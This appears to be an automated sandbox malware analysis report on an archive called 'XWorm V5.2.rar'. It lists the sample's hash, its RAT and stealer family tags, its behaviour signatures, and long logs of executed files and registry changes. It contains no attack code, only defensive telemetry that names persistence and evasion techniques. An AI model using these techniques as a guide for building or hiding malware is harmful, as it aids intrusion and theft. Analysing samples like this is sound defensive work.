Malware Analysis Report

2024-09-23 01:10

Sample ID 240516-p8t5nsdg9v
Target XWorm V5.2.rar
SHA256 fa4e6545f776160094004f3bfc1c9e199ec43e22870b1674b48ecc9a80ec71fb
Tags
agilenet agenttesla stormkitty xworm adware discovery keylogger persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fa4e6545f776160094004f3bfc1c9e199ec43e22870b1674b48ecc9a80ec71fb

Threat Level: Known bad

The file XWorm V5.2.rar was found to be: Known bad.

Malicious Activity Summary

agilenet agenttesla stormkitty xworm adware discovery keylogger persistence rat spyware stealer trojan

StormKitty payload

AgentTesla payload

Stormkitty family

Xworm

Detect Xworm Payload

AgentTesla

Contains code to disable Windows Defender

Agenttesla family

AgentTesla payload

Sets file execution options in registry

Downloads MZ/PE file

Modifies Installed Components in the registry

Obfuscated with Agile.Net obfuscator

Registers COM server for autorun

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Uses the VBS compiler for execution

Checks installed software on the system

Installs/modifies Browser Helper Object

Adds Run key to start application

Looks up external IP address via web service

Checks system information in the registry

Drops file in System32 directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

System policy modification

Suspicious use of SendNotifyMessage

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

Modifies Internet Explorer settings

Modifies registry class

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Download via BitsAdmin

Suspicious behavior: GetForegroundWindowSpam

Checks SCSI registry key(s)

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-16 13:00

Signatures

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Agenttesla family

agenttesla

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Stormkitty family

stormkitty

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-16 13:00

Reported

2024-05-16 13:21

Platform

win10v2004-20240426-en

Max time kernel

1199s

Max time network

1200s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.rar"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE} C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\ = "Microsoft Edge" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\StubPath = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Localized Name = "Microsoft Edge" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\IsInstalled = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Version = "43,0,0,0" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A

Sets file execution options in registry

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\XClient.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\e5f39b6\winzip28-lan.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\winrar-x64-701.exe N/A
N/A N/A C:\Users\Admin\Downloads\7z2405-x64.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\Downloads\winrar-x64-701.exe N/A
N/A N/A C:\Users\Admin\Downloads\winrar-x64-701.exe N/A
N/A N/A C:\Users\Admin\Downloads\winrar-x64-701 (1).exe N/A
N/A N/A C:\Users\Admin\Downloads\winrar-x32-701.exe N/A
N/A N/A C:\Users\Admin\Downloads\winzip28-lan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e5f39b6\winzip28-lan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Users\Admin\Downloads\winzip28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e60578a\winzip28.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BFFC50DF-F311-4333-81BC-37376CAA023B}\BGAUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\MicrosoftEdge_X64_124.0.2478.97.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Users\Admin\Desktop\XClient.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\MicrosoftEdge_X64_124.0.2478.105.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Installer\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Installer\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Users\Admin\Desktop\XClient.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Registers COM server for autorun

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{4A749F25-A9E2-4CBE-9859-CF7B15255E14}\LocalServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{B54934CD-71A6-4698-BDC2-AFEA5B86504C}\InprocServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ThreadingModel = "Both" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ThreadingModel = "Both" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\INPROCSERVER32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}\LocalServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ThreadingModel = "Both" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ThreadingModel = "Both" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4A749F25-A9E2-4CBE-9859-CF7B15255E14}\LocalServer32\ServerExecutable = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\notification_click_helper.exe" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B54934CD-71A6-4698-BDC2-AFEA5B86504C}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\7z2405-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32\ThreadingModel = "Both" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 C:\Users\Admin\Downloads\7z2405-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32\ThreadingModel = "Both" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32\ThreadingModel = "Both" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\notification_helper.exe\"" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\INPROCSERVER32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ThreadingModel = "Both" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
